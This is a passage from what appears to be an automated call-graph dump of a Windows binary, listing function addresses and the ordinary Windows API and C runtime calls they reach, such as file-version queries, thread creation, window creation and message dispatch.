calls 61151 3feca1 GetFileVersionInfoSizeExW 61150->61151 61154 3fecf5 61151->61154 61155 3ff0e0 GetLastError 61151->61155 61152->61148 61152->61150 61172 3ff054 _Ref_count_obj 61152->61172 61156 3fe9d0 196 API calls 61154->61156 61157 3fed02 GetFileVersionInfoExW 61156->61157 61158 3ff107 GetLastError 61157->61158 61159 3fed31 61157->61159 61160 3ff12e 61158->61160 61162 3e22e0 183 API calls 61159->61162 61161 4291af 183 API calls 61160->61161 61163 3ff133 61161->61163 61164 3fed4b 61162->61164 61194 3f51a0 183 API calls _Ref_count_obj 61163->61194 61164->61160 61165 3fed7f _Ref_count_obj 61164->61165 61165->61163 61166 3feda7 VerQueryValueW 61165->61166 61167 3ff1ad GetLastError 61166->61167 61187 3fedea _Ref_count_obj 61166->61187 61196 3f51a0 183 API calls _Ref_count_obj 61167->61196 61170 3ff009 61170->61172 61175 4291af 183 API calls 61170->61175 61171 3feba0 196 API calls 61171->61187 61172->61147 61174 3ff170 61195 3f51a0 183 API calls _Ref_count_obj 61174->61195 61175->61167 61177 3fee87 GetLastError 61191 3ffaa0 183 API calls _Ref_count_obj 61177->61191 61179 3ff18a 61181 4291af 183 API calls 61179->61181 61183 3ff1a3 61181->61183 61182 3e21d0 185 API calls 61182->61187 61185 4291af 183 API calls 61183->61185 61184 3e22e0 183 API calls 61184->61187 61185->61170 61187->61167 61187->61170 61187->61171 61187->61174 61187->61177 61187->61179 61187->61182 61187->61183 61187->61184 61190 4000b0 203 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 61187->61190 61192 3f51a0 183 API calls _Ref_count_obj 61187->61192 61193 3ffaa0 183 API calls _Ref_count_obj 61187->61193 61188->61133 61190->61187 61191->61187 61192->61187 61193->61187 61194->61172 61195->61172 61196->61172 61197->61102 61199 3ff417 61198->61199 61200 3ff430 61198->61200 61201 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61199->61201 61232 3fcbf0 185 API calls 61200->61232 61203 3ff42a 61201->61203 61203->61038 61204 3ff443 61205 3ff44d 61204->61205 61207 3ff46b 61204->61207 61206 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61205->61206 61209 3ff465 61206->61209 61208 3ff4c6 61207->61208 61211 3ff4a8 61207->61211 61210 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61208->61210 61209->61038 61212 3ff4e5 61210->61212 61213 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61211->61213 61212->61038 61214 3ff4c0 61213->61214 61214->61038 61216 3ff54f GetModuleHandleW 61215->61216 61217 3ff55a 61215->61217 61216->61217 61218 3ff3f0 185 API calls 61217->61218 61220 3ff56b 61218->61220 61221 3ff619 61220->61221 61222 3ff3f0 185 API calls 61220->61222 61236 3ffcb0 185 API calls 61220->61236 61223 3ff6ce NtCreateFile 61221->61223 61224 3ff736 61221->61224 61222->61220 61225 3ff6e6 61223->61225 61226 3ff717 61223->61226 61229 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61224->61229 61233 405de0 61225->61233 61237 3fb060 CloseHandle 61226->61237 61230 3fd349 61229->61230 61230->61041 61230->61042 61232->61204 61238 4064d0 61233->61238 61236->61220 61237->61224 61241 406513 61238->61241 61239 406520 GetFinalPathNameByHandleW 61240 40656a GetLastError 61239->61240 61239->61241 61242 406563 61240->61242 61241->61239 61241->61242 61243 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61242->61243 61244 3ff70a 61243->61244 61244->61226 61246 3f5409 61245->61246 61254 3f54ae std::_Rethrow_future_exception _Ref_count_obj 61245->61254 61247 3f54f4 61246->61247 61248 3f5422 61246->61248 61257 3e2130 185 API calls 61247->61257 61256 3e2340 185 API calls Concurrency::cancel_current_task 61248->61256 61251 4291af 183 API calls 61253 3f54fe 61251->61253 61252 3f5465 std::_Rethrow_future_exception 61252->61251 61252->61254 61254->60975 61255->60975 61256->61252 61278 404100 61258->61278 61260 4004a0 61283 400070 61260->61283 61263 4004e4 61265 404100 15 API calls 61263->61265 61267 400553 61265->61267 61266 400501 61288 3e2540 188 API calls 61266->61288 61270 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61267->61270 61269 400521 61289 400610 185 API calls IsInExceptionSpec 61269->61289 61272 400598 61270->61272 61272->60986 61273 40052d 61290 3f56d0 183 API calls _Ref_count_obj 61273->61290 61320 3e6f20 61275->61320 61277 3e724c 61277->60989 61279 4041b0 61278->61279 61280 404136 IsInExceptionSpec 61278->61280 61279->61260 61291 4261c0 15 API calls 2 library calls 61280->61291 61282 40419b 61282->61260 61284 400085 61283->61284 61292 42d929 61284->61292 61287 400690 185 API calls 61287->61266 61288->61269 61289->61273 61290->61263 61291->61282 61293 42d93d ___std_exception_copy 61292->61293 61298 429a40 61293->61298 61299 429a8f 61298->61299 61300 429a6c 61298->61300 61299->61300 61304 429a97 61299->61304 61315 429122 183 API calls ___std_exception_copy 61300->61315 61302 429a84 61303 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61302->61303 61305 429bb2 61303->61305 61316 42bd0f 188 API calls 2 library calls 61304->61316 61309 428edb 61305->61309 61308 429b18 61317 42b755 14 API calls ___free_lconv_mon 61308->61317 61310 428ee7 61309->61310 61311 428efe 61310->61311 61318 428f86 183 API calls 2 library calls 61310->61318 61312 400093 61311->61312 61319 428f86 183 API calls 2 library calls 61311->61319 61312->61263 61312->61287 61315->61302 61316->61308 61317->61302 61318->61311 61319->61312 61340 3f5820 185 API calls 3 library calls 61320->61340 61322 3e6f72 61323 3e6f95 61322->61323 61341 3f8730 185 API calls 3 library calls 61322->61341 61326 3e6ffa std::_Rethrow_future_exception 61323->61326 61342 3f8730 185 API calls 3 library calls 61323->61342 61327 3e7055 _Ref_count_obj 61326->61327 61330 3e7120 61326->61330 61343 426fbb 184 API calls 3 library calls 61327->61343 61329 3e70b3 61331 3e70e2 _Ref_count_obj 61329->61331 61334 3e7125 61329->61334 61332 4291af 183 API calls 61330->61332 61333 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61331->61333 61332->61334 61335 3e7117 61333->61335 61336 4291af 183 API calls 61334->61336 61335->61277 61337 3e712a 61336->61337 61344 42701e 14 API calls ___std_exception_destroy 61337->61344 61339 3e7145 _Ref_count_obj 61339->61277 61340->61322 61341->61323 61342->61326 61343->61329 61344->61339 61345->60994 61346->60996 61348 400045 61347->61348 61353 42d96a 61348->61353 61351->61008 61352->61012 61354 42d97e ___std_exception_copy 61353->61354 61359 429bb4 61354->61359 61357 428edb ___std_exception_copy 183 API calls 61358 400053 61357->61358 61358->61002 61358->61003 61360 429c03 61359->61360 61361 429be0 61359->61361 61360->61361 61365 429c0b 61360->61365 61370 429122 183 API calls ___std_exception_copy 61361->61370 61363 429bf8 61364 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61363->61364 61366 429d35 61364->61366 61371 42c233 187 API calls ___std_exception_copy 61365->61371 61366->61357 61368 429c8c 61372 42b755 14 API calls ___free_lconv_mon 61368->61372 61370->61363 61371->61368 61372->61363 61374 4014db _Ref_count_obj 61373->61374 61378 401149 61373->61378 61377 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61374->61377 61375 401151 61376 3e21d0 185 API calls 61375->61376 61386 401179 _Ref_count_obj 61376->61386 61380 3ee29d 61377->61380 61378->61375 61379 4015b1 61378->61379 61417 3fb1b0 240 API calls 61379->61417 61380->61017 61382 4015b6 61418 4015e0 15 API calls 2 library calls 61382->61418 61384 40121a 61387 401402 61384->61387 61388 40122a 61384->61388 61385 4015c9 61419 3fcff0 183 API calls _Ref_count_obj 61385->61419 61386->61382 61386->61384 61390 4015d8 61386->61390 61392 401406 61387->61392 61393 401449 61387->61393 61391 401232 61388->61391 61399 40133a 61388->61399 61394 4291af 183 API calls 61390->61394 61406 3fc3c0 61391->61406 61396 3ee7b0 239 API calls 61392->61396 61397 3ee7b0 239 API calls 61393->61397 61395 4015dd 61394->61395 61398 4012fb _Ref_count_obj 61396->61398 61397->61398 61398->61390 61416 4015e0 15 API calls 2 library calls 61398->61416 61403 3ee7b0 239 API calls 61399->61403 61401 40126c 61404 3ee7b0 239 API calls 61401->61404 61402 40149c 61402->61374 61402->61390 61403->61398 61404->61398 61407 3fc41d 61406->61407 61413 3fc574 _Ref_count_obj 61406->61413 61420 3fb890 61407->61420 61409 3fc42c _Ref_count_obj 61412 3fc5cd 61409->61412 61409->61413 61410 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61411 3fc5a8 61410->61411 61411->61401 61414 4291af 183 API calls 61412->61414 61413->61410 61415 3fc5d2 61414->61415 61415->61401 61416->61402 61418->61385 61419->61374 61421 3fb8bf ___scrt_uninitialize_crt IsInExceptionSpec 61420->61421 61436 3fb7e0 FormatMessageW 61421->61436 61423 3fb912 61424 3fb962 61423->61424 61437 3fb7e0 FormatMessageW 61423->61437 61439 404460 187 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 61424->61439 61427 3fb936 61427->61424 61438 3fb7e0 FormatMessageW 61427->61438 61428 3fb974 61435 3fb984 61428->61435 61440 3fc850 183 API calls _Ref_count_obj 61428->61440 61431 3fb957 61431->61424 61432 3fbac9 GetLastError 61431->61432 61432->61435 61433 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61434 3fbac2 61433->61434 61434->61409 61435->61433 61436->61423 61437->61427 61438->61431 61439->61428 61440->61435 61461 424501 61441->61461 61443 4247c1 61443->60930 61445 42de41 61444->61445 61446 42de2d 61444->61446 61467 42ddd0 61445->61467 61476 42da48 14 API calls __dosmaperr 61446->61476 61450 42de32 61477 42919f 183 API calls ___std_exception_copy 61450->61477 61451 42de56 CreateThread 61453 42de75 GetLastError 61451->61453 61454 42de81 61451->61454 61503 42dcc4 61451->61503 61478 42d9ee 14 API calls __dosmaperr 61453->61478 61479 42dd42 61454->61479 61455 42de3d 61455->60936 61464 42450e 61461->61464 61462 4244ea RtlInitializeConditionVariable 61462->61443 61463 4244cc InitializeCriticalSectionEx 61463->61443 61464->61462 61464->61463 61487 431398 61467->61487 61472 42de12 61474 42dd42 16 API calls 61472->61474 61473 42ddf5 GetModuleHandleExW 61473->61472 61475 42de1a 61474->61475 61475->61451 61475->61454 61476->61450 61477->61455 61478->61454 61480 42dd72 61479->61480 61481 42dd4e 61479->61481 61480->60936 61482 42dd54 CloseHandle 61481->61482 61483 42dd5d 61481->61483 61482->61483 61484 42dd63 FreeLibrary 61483->61484 61485 42dd6c 61483->61485 61484->61485 61486 430201 ___free_lconv_mon 14 API calls 61485->61486 61486->61480 61492 4313a5 __dosmaperr 61487->61492 61488 4313e5 61501 42da48 14 API calls __dosmaperr 61488->61501 61489 4313d0 RtlAllocateHeap 61490 42dde1 61489->61490 61489->61492 61494 430201 61490->61494 61492->61488 61492->61489 61500 42e093 RtlEnterCriticalSection RtlLeaveCriticalSection __dosmaperr 61492->61500 61495 43020c HeapFree 61494->61495 61499 42ddee 61494->61499 61496 430221 GetLastError 61495->61496 61495->61499 61497 43022e __dosmaperr 61496->61497 61502 42da48 14 API calls __dosmaperr 61497->61502 61499->61472 61499->61473 61500->61492 61501->61490 61502->61499 61504 42dcd0 ___scrt_is_nonwritable_in_current_image 61503->61504 61505 42dcd7 GetLastError RtlExitUserThread 61504->61505 61506 42dce4 61504->61506 61505->61506 61519 42ff16 GetLastError 61506->61519 61512 42dd00 61551 3f9ea0 61512->61551 61513 42dd1c 61557 42dea3 17 API calls 61513->61557 61520 42ff32 61519->61520 61521 42ff2c 61519->61521 61544 42ff36 SetLastError 61520->61544 61559 4316b4 6 API calls __dosmaperr 61520->61559 61558 431675 6 API calls __dosmaperr 61521->61558 61524 42ff4e 61525 431398 __dosmaperr 14 API calls 61524->61525 61524->61544 61527 42ff63 61525->61527 61530 42ff6b 61527->61530 61531 42ff7c 61527->61531 61528 42dce9 61546 431882 61528->61546 61529 42ffcb 61564 42e422 183 API calls IsInExceptionSpec 61529->61564 61560 4316b4 6 API calls __dosmaperr 61530->61560 61561 4316b4 6 API calls __dosmaperr 61531->61561 61536 42ff79 61541 430201 ___free_lconv_mon 14 API calls 61536->61541 61537 42ff88 61538 42ffa3 61537->61538 61539 42ff8c 61537->61539 61563 42fd44 14 API calls __dosmaperr 61538->61563 61562 4316b4 6 API calls __dosmaperr 61539->61562 61541->61544 61543 42ffae 61545 430201 ___free_lconv_mon 14 API calls 61543->61545 61544->61528 61544->61529 61545->61544 61547 42dcf4 61546->61547 61548 431894 GetPEB 61546->61548 61547->61512 61556 4317cf 5 API calls __dosmaperr 61547->61556 61548->61547 61549 4318a7 61548->61549 61565 4315b7 5 API calls __dosmaperr 61549->61565 61566 3e89a0 61551->61566 61555 3f9eb3 _Ref_count_obj 61555->61513 61556->61512 61558->61520 61559->61524 61560->61536 61561->61537 61562->61536 61563->61543 61565->61547 61619 42deb1 61566->61619 61569 3e8a2c GetCurrentThread SetThreadPriority 61571 3e8a4c 61569->61571 61572 3e8a40 61569->61572 61570 3e8a19 GetCurrentThread SetThreadDescription 61570->61569 61574 3f5300 191 API calls 61571->61574 61573 3ee7b0 239 API calls 61572->61573 61573->61571 61575 3e8a5a 61574->61575 61576 3ffe90 3 API calls 61575->61576 61617 3e8a86 __Mtx_unlock 61576->61617 61577 3e8c2d 61578 3ee7b0 239 API calls 61577->61578 61587 3e8c45 61577->61587 61578->61587 61579 3e8f97 61584 3e8fac 61579->61584 61588 3ee7b0 239 API calls 61579->61588 61580 3e8cb3 61586 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61580->61586 61581 3e8ca9 GetCurrentThreadId 61581->61580 61582 424cbf RtlAcquireSRWLockExclusive 61582->61617 61583 3ffe90 QueryUnbiasedInterruptTimePrecise QueryUnbiasedInterruptTime QueryInterruptTime 61583->61617 61654 424cbf RtlAcquireSRWLockExclusive 61584->61654 61590 3e8cd6 61586->61590 61591 3ee7b0 239 API calls 61587->61591 61593 3e8c73 61587->61593 61588->61584 61589 3e8fba 61655 424cdb RtlReleaseSRWLockExclusive 61589->61655 61618 424822 GetCurrentThreadId RtlEnterCriticalSection RtlLeaveCriticalSection __Mtx_unlock __Cnd_broadcast 61590->61618 61591->61593 61593->61580 61593->61581 61594 3ee7b0 239 API calls 61594->61617 61602 3e90d2 61659 424c11 188 API calls IsInExceptionSpec 61602->61659 61603 3e8fcc 61603->61577 61656 3e7740 197 API calls 61603->61656 61657 3f4cb0 196 API calls 61603->61657 61604 3e90c8 61658 3e7260 187 API calls 2 library calls 61604->61658 61608 3e90a7 61609 3e8c25 61608->61609 61612 3ee7b0 239 API calls 61608->61612 61650 424cdb RtlReleaseSRWLockExclusive 61609->61650 61612->61609 61613 3f86e0 199 API calls 61613->61617 61615 424cdb RtlReleaseSRWLockExclusive 61615->61617 61616 3fa080 197 API calls 61616->61617 61617->61577 61617->61579 61617->61582 61617->61583 61617->61594 61617->61602 61617->61604 61617->61608 61617->61613 61617->61615 61617->61616 61622 3e90e0 61617->61622 61647 3f6990 7 API calls 3 library calls 61617->61647 61648 3f8b20 201 API calls 4 library calls 61617->61648 61649 3e9660 271 API calls 3 library calls 61617->61649 61651 4247d2 13 API calls 61617->61651 61652 42397a GetCurrentThreadId do_wait 61617->61652 61653 3f6af0 199 API calls 2 library calls 61617->61653 61618->61555 61620 42ff16 _unexpected 183 API calls 61619->61620 61621 3e89fb 61620->61621 61621->61569 61621->61570 61623 3e9132 61622->61623 61624 3e913e 61622->61624 61625 3ee7b0 239 API calls 61623->61625 61626 3e92a3 61624->61626 61627 3e91b4 61624->61627 61625->61624 61629 400320 203 API calls 61626->61629 61628 3e91c9 61627->61628 61630 3ee7b0 239 API calls 61627->61630 61632 42571f 185 API calls 61628->61632 61631 3e92d0 61629->61631 61630->61628 61660 3f6aa0 61631->61660 61634 3e91fa 61632->61634 61637 3e9264 61634->61637 61638 3e9330 61634->61638 61636 3e22e0 183 API calls 61636->61637 61641 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61637->61641 61639 400320 203 API calls 61638->61639 61640 3e9341 61639->61640 61643 4016f0 244 API calls 61640->61643 61642 3e929a 61641->61642 61642->61617 61644 3e93a2 61643->61644 61645 3e22e0 183 API calls 61644->61645 61646 3e93b0 61645->61646 61646->61646 61647->61617 61648->61617 61649->61617 61650->61577 61651->61617 61652->61617 61653->61617 61654->61589 61655->61603 61656->61603 61657->61603 61658->61602 61661 3f6ab5 61660->61661 61662 4016f0 244 API calls 61661->61662 61663 3e931d 61662->61663 61663->61636 61665 40911b 61664->61665 61684 3ee7e6 61664->61684 61666 425d49 6 API calls 61665->61666 61667 409125 61666->61667 61667->61684 61690 3ee6c0 61667->61690 61673 40916e 61676 409189 61673->61676 61738 409610 61673->61738 61675 40917c 61778 4263fd 14 API calls 61675->61778 61680 40920d 61676->61680 61681 4091b8 _Ref_count_obj 61676->61681 61678 4091cc 61780 425cff RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 61678->61780 61683 4291af 183 API calls 61680->61683 61779 42598b 186 API calls 61681->61779 61685 409212 61683->61685 61684->60867 61686 409220 61684->61686 61687 40924c 61686->61687 61812 40a810 61687->61812 61691 3e21d0 185 API calls 61690->61691 61692 3ee737 61691->61692 61693 4092d0 61692->61693 61781 42640f 61693->61781 61695 409315 IsInExceptionSpec 61696 42571f 185 API calls 61695->61696 61697 409158 61695->61697 61696->61697 61698 408f50 61697->61698 61699 408fc0 61698->61699 61711 409013 61698->61711 61700 4092d0 185 API calls 61699->61700 61704 408fc8 61700->61704 61701 40903c 61702 409042 61701->61702 61703 40908c 61701->61703 61710 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61702->61710 61706 400460 190 API calls 61703->61706 61705 409610 209 API calls 61704->61705 61704->61711 61707 409006 61705->61707 61709 40909a 61706->61709 61798 4263fd 14 API calls 61707->61798 61713 3e7230 185 API calls 61709->61713 61712 409083 61710->61712 61737 409610 209 API calls 61711->61737 61712->61673 61714 4090bf 61713->61714 61715 427210 Concurrency::cancel_current_task RaiseException 61714->61715 61716 4090cd 61715->61716 61717 4091d9 61716->61717 61718 425d49 6 API calls 61716->61718 61717->61673 61719 409125 61718->61719 61719->61717 61720 3ee6c0 185 API calls 61719->61720 61721 40914b 61720->61721 61722 4092d0 185 API calls 61721->61722 61723 409158 61722->61723 61724 408f50 224 API calls 61723->61724 61725 40916e 61724->61725 61726 409189 61725->61726 61727 409610 209 API calls 61725->61727 61728 4091b8 _Ref_count_obj 61726->61728 61733 40920d 61726->61733 61729 40917c 61727->61729 61800 42598b 186 API calls 61728->61800 61799 4263fd 14 API calls 61729->61799 61731 4091cc 61801 425cff RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 61731->61801 61735 4291af 183 API calls 61733->61735 61736 409212 61735->61736 61737->61701 61740 409627 _Ref_count_obj 61738->61740 61739 4291af 183 API calls 61744 4098a6 61739->61744 61740->61739 61741 40987d _Ref_count_obj 61740->61741 61741->61675 61742 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61743 409dd4 61742->61743 61743->61675 61745 40999f 61744->61745 61747 3e21d0 185 API calls 61744->61747 61777 409a13 _Ref_count_obj 61744->61777 61802 400b90 61745->61802 61747->61745 61748 4099b4 61806 40afa0 61748->61806 61750 4099c6 61751 4099f0 _Ref_count_obj 61750->61751 61753 409ddd 61750->61753 61752 3fd2a0 191 API calls 61751->61752 61756 409a04 61752->61756 61754 4291af 183 API calls 61753->61754 61755 409df6 61754->61755 61757 3e21d0 185 API calls 61756->61757 61756->61777 61758 409a8b 61757->61758 61759 409aac _Ref_count_obj 61758->61759 61760 3e21d0 185 API calls 61758->61760 61761 400b90 185 API calls 61759->61761 61760->61759 61762 409aff 61761->61762 61763 40afa0 183 API calls 61762->61763 61765 409b0b _Ref_count_obj 61763->61765 61764 3e8200 209 API calls 61766 409b51 61764->61766 61765->61764 61767 409b6a 61766->61767 61768 409b5d 61766->61768 61769 3e21d0 185 API calls 61767->61769 61770 3f5580 183 API calls 61768->61770 61771 409b92 61769->61771 61773 409b68 _Ref_count_obj 61770->61773 61772 3f5580 183 API calls 61771->61772 61772->61773 61774 400b90 185 API calls 61773->61774 61775 409c49 61774->61775 61776 40afa0 183 API calls 61775->61776 61776->61777 61777->61742 61778->61676 61779->61678 61780->61684 61784 426414 61781->61784 61783 426432 61783->61695 61784->61783 61786 426434 61784->61786 61796 42e093 RtlEnterCriticalSection RtlLeaveCriticalSection __dosmaperr 61784->61796 61797 42f9cb 184 API calls 3 library calls 61784->61797 61787 42643e 61786->61787 61788 3e2090 Concurrency::cancel_current_task 61786->61788 61790 427210 Concurrency::cancel_current_task RaiseException 61787->61790 61789 427210 Concurrency::cancel_current_task RaiseException 61788->61789 61791 3e20ac 61789->61791 61792 4265f1 61790->61792 61795 426fbb 184 API calls 3 library calls 61791->61795 61794 3e20d3 61794->61695 61795->61794 61796->61784 61797->61784 61798->61711 61799->61726 61800->61731 61801->61717 61803 400c12 61802->61803 61805 400c09 IsInExceptionSpec 61802->61805 61803->61805 61811 400830 185 API calls 4 library calls 61803->61811 61805->61748 61807 40afcd 61806->61807 61808 40aff0 _Ref_count_obj 61806->61808 61807->61808 61809 4291af 183 API calls 61807->61809 61808->61750 61810 40b04a 61809->61810 61811->61805 61815 40ad20 61812->61815 61816 40af3b 61815->61816 61817 40ad8b GetLastError 61815->61817 61819 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61816->61819 61818 40af6c 61817->61818 61822 40adb8 61817->61822 61840 40a000 61818->61840 61821 409250 61819->61821 61821->60867 61824 40ae11 61822->61824 61826 40adde SwitchToThread 61822->61826 61860 424cbf RtlAcquireSRWLockExclusive 61822->61860 61867 424cdb RtlReleaseSRWLockExclusive 61822->61867 61861 3f9e40 188 API calls 61824->61861 61826->61822 61828 40ae33 61862 400000 187 API calls 61828->61862 61830 40ae5b 61832 40ae78 61830->61832 61863 40a940 5 API calls 2 library calls 61830->61863 61864 424cbf RtlAcquireSRWLockExclusive 61832->61864 61834 40aec3 61836 40aed2 61834->61836 61865 40a9c0 197 API calls 4 library calls 61834->61865 61837 40aefd SetLastError 61836->61837 61866 424cdb RtlReleaseSRWLockExclusive 61836->61866 61837->61816 61839 40aefa 61839->61837 61868 424cbf RtlAcquireSRWLockExclusive 61840->61868 61842 40a03c 61843 40a05a GetModuleHandleW 61842->61843 61854 40a146 61842->61854 61869 424cf7 GetNativeSystemInfo 61843->61869 61846 40a160 61848 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61846->61848 61847 40a088 61850 42571f 185 API calls 61847->61850 61849 40a17b 61848->61849 61849->61822 61851 40a0a7 61850->61851 61852 40a0f2 61851->61852 61853 40a17f 61851->61853 61858 40a0fa 61851->61858 61870 40a860 185 API calls 3 library calls 61852->61870 61873 3f43e0 185 API calls 61853->61873 61872 424cdb RtlReleaseSRWLockExclusive 61854->61872 61858->61854 61871 40a9c0 197 API calls 4 library calls 61858->61871 61860->61822 61861->61828 61862->61830 61863->61832 61864->61834 61865->61836 61866->61839 61867->61822 61868->61842 61869->61847 61870->61858 61871->61858 61872->61846 61874->60877 60609 258d01c 60610 258d030 60609->60610 60611 258d070 60610->60611 60614 25b0839 60610->60614 60621 25b0848 60610->60621 60616 25b084d 60614->60616 60615 25b0990 60617 25b0996 60615->60617 60632 632a128 60615->60632 60636 632a11a 60615->60636 60616->60615 60628 25b6eb0 60616->60628 60617->60611 60624 25b084d 60621->60624 60622 25b0990 60623 25b0996 60622->60623 60626 632a11a 6 API calls 60622->60626 60627 632a128 6 API calls 60622->60627 60623->60611 60624->60622 60625 25b6eb0 CreateActCtxA 60624->60625 60625->60624 60626->60623 60627->60623 60640 25b6ed0 60628->60640 60644 25b6ee0 60628->60644 60633 632a137 60632->60633 60652 63293ac 60633->60652 60637 632a128 60636->60637 60638 63293ac 6 API calls 60637->60638 60639 632a158 60638->60639 60639->60617 60642 25b6ed7 60640->60642 60641 25b6fe4 60641->60641 60642->60641 60648 25b6984 60642->60648 60646 25b6f07 60644->60646 60645 25b6fe4 60645->60645 60646->60645 60647 25b6984 CreateActCtxA 60646->60647 60647->60645 60649 25b7f70 CreateActCtxA 60648->60649 60651 25b8033 60649->60651 60654 63293b7 60652->60654 60656 63294f4 60654->60656 60655 632aa55 60655->60655 60658 63294ff 60656->60658 60657 632b71f 60657->60655 60658->60657 60659 632b6c4 60658->60659 60663 632cf48 60658->60663 60659->60657 60668 6307d67 60659->60668 60673 6307d78 60659->60673 60664 632cf69 60663->60664 60665 632cf8d 60664->60665 60678 632d0f0 60664->60678 60682 632d0f8 60664->60682 60665->60659 60671 6307ddd 60668->60671 60669 6308240 WaitMessage 60669->60671 60671->60669 60672 6307e2a 60671->60672 60734 6306d74 60671->60734 60672->60657 60675 6307ddd 60673->60675 60674 6307e2a 60674->60657 60675->60674 60676 6308240 WaitMessage 60675->60676 60677 6306d74 DispatchMessageW 60675->60677 60676->60675 60677->60675 60679 632d0f8 60678->60679 60680 632d13e 60679->60680 60686 632b2f4 60679->60686 60680->60665 60683 632d105 60682->60683 60684 632d13e 60683->60684 60685 632b2f4 3 API calls 60683->60685 60684->60665 60685->60684 60687 632b2ff 60686->60687 60689 632d1b0 60687->60689 60690 632b328 60687->60690 60689->60689 60691 632b333 60690->60691 60697 632b338 60691->60697 60693 632d21e 60701 6300a78 60693->60701 60710 6300a90 60693->60710 60694 632d259 60694->60689 60700 632b343 60697->60700 60698 632e239 60698->60693 60699 632cf48 3 API calls 60699->60698 60700->60698 60700->60699 60703 6300ac1 60701->60703 60704 6300bc0 60701->60704 60702 6300acd 60702->60694 60703->60702 60719 6300cf8 60703->60719 60723 6300d08 60703->60723 60704->60694 60705 6300b0c 60726 6302008 60705->60726 60730 6301ffa 60705->60730 60712 6300ac1 60710->60712 60713 6300bc0 60710->60713 60711 6300acd 60711->60694 60712->60711 60717 6300cf8 2 API calls 60712->60717 60718 6300d08 2 API calls 60712->60718 60713->60694 60714 6300b0c 60715 6302008 CreateWindowExW 60714->60715 60716 6301ffa CreateWindowExW 60714->60716 60715->60713 60716->60713 60717->60714 60718->60714 60720 6300cfd 60719->60720 60722 6300d51 LoadLibraryExW GetModuleHandleW 60720->60722 60721 6300d12 60721->60705 60722->60721 60724 6300d12 60723->60724 60725 6300d51 LoadLibraryExW GetModuleHandleW 60723->60725 60724->60705 60725->60724 60727 6302033 60726->60727 60728 63020e2 60727->60728 60729 6302e91 CreateWindowExW 60727->60729 60729->60728 60731 6302008 60730->60731 60732 63020e2 60731->60732 60733 6302e91 CreateWindowExW 60731->60733 60733->60732 60735 6308ee8 DispatchMessageW 60734->60735 60736 6308f54 60735->60736 60736->60671 60737 258d0dc 60738 258d0f4 60737->60738 60739 258d14e 60738->60739 60744 63030e8 60738->60744 60748 63002ec 60738->60748 60757 6303e39 60738->60757 60766 63030d8 60738->60766 60745 630310e 60744->60745 60746 63002ec CallWindowProcW 60745->60746 60747 630312f 60746->60747 60747->60739 60749 63002f7 60748->60749 60750 6303ea9 60749->60750 60752 6303e99 60749->60752 60783 6300414 60750->60783 60770 63044a4 60752->60770 60775 63043d8 60752->60775 60779 63043c8 60752->60779 60753 6303ea7 60760 6303e75 60757->60760 60758 6303ea9 60759 6300414 CallWindowProcW 60758->60759 60762 6303ea7 60759->60762 60760->60758 60761 6303e99 60760->60761 60763 63044a4 CallWindowProcW 60761->60763 60764 63043d8 CallWindowProcW 60761->60764 60765 63043c8 CallWindowProcW 60761->60765 60763->60762 60764->60762 60765->60762 60767 63030e8 60766->60767 60768 63002ec CallWindowProcW 60767->60768 60769 630312f 60768->60769 60769->60739 60771 6304462 60770->60771 60772 63044b2 60770->60772 60787 6304490 60771->60787 60773 6304478 60773->60753 60777 63043ec 60775->60777 60776 6304478 60776->60753 60778 6304490 CallWindowProcW 60777->60778 60778->60776 60781 63043d8 60779->60781 60780 6304478 60780->60753 60782 6304490 CallWindowProcW 60781->60782 60782->60780 60784 630041f 60783->60784 60785 630571a CallWindowProcW 60784->60785 60786 63056c9 60784->60786 60785->60786 60786->60753 60788 63044a1 60787->60788 60790 6305651 60787->60790 60788->60773 60791 6300414 CallWindowProcW 60790->60791 60792 